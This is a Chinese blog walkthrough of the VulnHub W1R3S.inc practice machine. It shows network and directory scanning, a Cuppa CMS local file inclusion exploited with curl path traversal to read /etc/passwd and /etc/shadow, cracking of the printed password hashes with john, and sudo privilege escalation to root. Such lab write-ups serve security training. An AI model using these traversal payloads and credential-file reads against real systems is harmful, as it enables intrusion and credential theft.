【vulnhub】W1R3S.inc靶机

最新推荐文章于 2024-09-09 17:43:45 发布
最新推荐文章于 2024-09-09 17:43:45 发布
阅读量438 收藏 4
点赞数 4
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wbplife/article/details/140910326
版权

靶机安装

下载地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

运行环境:vmware

信息收集

靶机发现IP扫描

nmap 192.168.93.0/24

端口扫描,发现开放21、22、80、3306端口

nmap -A 192.168.93.159 -p-

进行目录扫描

dirsearach -u http://192.168.93.159

进行IP地址访问

后面拼接访问目录扫描出的目录/administrator

漏洞利用

这是一个数据库的安装创建,但不知道密码和数据库名,观察到最上面的网页标题为Cuppa CMS,可以通过它来 搜索一下它的历史漏洞,来进行利用

searchsploit cuppa   #kali上自带工具进行搜索

将这个结果复制到kali当前目录下面

searchsploit -m php/webapps/25971.txt

查看这个文件

cat 25971.txt

文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

在网页上面进行访问尝试

http://192.168.93.159/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

页面上什么也没有,用curl 尝试看可不可以下载下来

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.93.159/administrator/alerts/alertConfigField.php

在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.93.159/administrator/alerts/alertConfigField.php

发现了 root 、www-data 、 w1r3s 用户的密码,尝试用 john 破解

先把这三个用户的密码信息进行保存在一个txt文件中

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.

进行john破解

#破解命令
john password.txt

#破解出密码
www-data:www-data
w1r3s:computer

提权

进行远程连接,只有w1r3s用户可以连接成功

尝试 sudo 提权,发现该用户可以在任何地方执行任何名称文件获取 root 权限

sudo -l

写一个 sh 文件,赋权并以 sudo 命令执行,成功提权

echo '/bin/bash' >> root.sh
chmod +x root.sh
sudo ./root.sh

在 /root 目录下找到 flag.txt

wbplife
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
W1R3S.inc靶机
zdd1453691081的博客
08-05 163
【代码】W1R3S.inc靶机
Vulnhub靶机 W1R3S.inc(渗透测试详解)
2301_78721909的博客
08-03 393
Vulnhub靶机 W1R3S.inc 渗透测试详解(from wuhu)
靶机渗透】w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 604
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
vulnhub/W1R3S.inc
qq_45230030的博客
05-09 404
五一加调休在家躺尸真舒服,咸鱼生活真美啊,可惜结束的太快,啊,继续打靶下载地址:https://github.com/rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub
qq_63442530的博客
03-13 1047
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
VulnHub-W1R3S: 1.0.1渗透学习
我是小小白的博客
07-09 493
VulnHub-W1R3S: 1.0.1渗透学习 前言 靶机地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip 靶机难度:初级(CTF) 靶机发布日期:2018 年 2 月 5 日 靶机描述:您受雇在 W1R3S.inc 个人服务器上进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到标志(位于 /root 目录中); 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-09 请注意: 本博客
w1r3s 靶机学习
m0_63416413的博客
04-09 1271
w1r3s靶机学习,随手记录,参照B站RedTeamNotes的视频学习,红笔老登🤤
vulnhub W1R3S
m0_73391639的博客
08-08 1176
vulnhub W1R3S靶场
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1796
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
Vulnhub lin security靶机.pdf
07-29
Vulnhub lin security靶机.pdf
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8454
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1413
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
最新发布
weixin_49171105的博客
09-09 370
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 642
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 417
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值